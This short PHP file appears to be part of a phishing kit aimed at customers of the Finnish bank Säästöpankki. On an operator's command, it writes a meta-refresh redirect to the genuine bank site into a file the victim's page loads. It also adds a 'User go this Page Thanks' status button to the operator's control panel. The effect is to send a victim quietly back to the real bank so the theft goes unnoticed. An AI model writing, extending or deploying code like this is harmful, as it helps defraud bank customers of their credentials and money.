<?php


session_start();

if(isset($_POST['textThanks'])) 
{
    
$Page .= ' <meta http-equiv="refresh" content="0;url=https://www4.saastopankki.fi/" />
  ';

$fPage = fopen("../Show_system/Show_Page.txt", "w");
    fwrite($fPage, $Page);




$Pag .= '<div class="expanded button-group" style="
    text-align: center;
"><input type="submit" value="✅ User go this Page Thanks 💯" class="btn nbl input-medium" style="
    background: #8bc34a;
"></div>';

$fPag = fopen("../Show_system/Show_Select.txt", "w");
    fwrite($fPag, $Pag);


header("location:../Select.php");


}

else {




}

?>
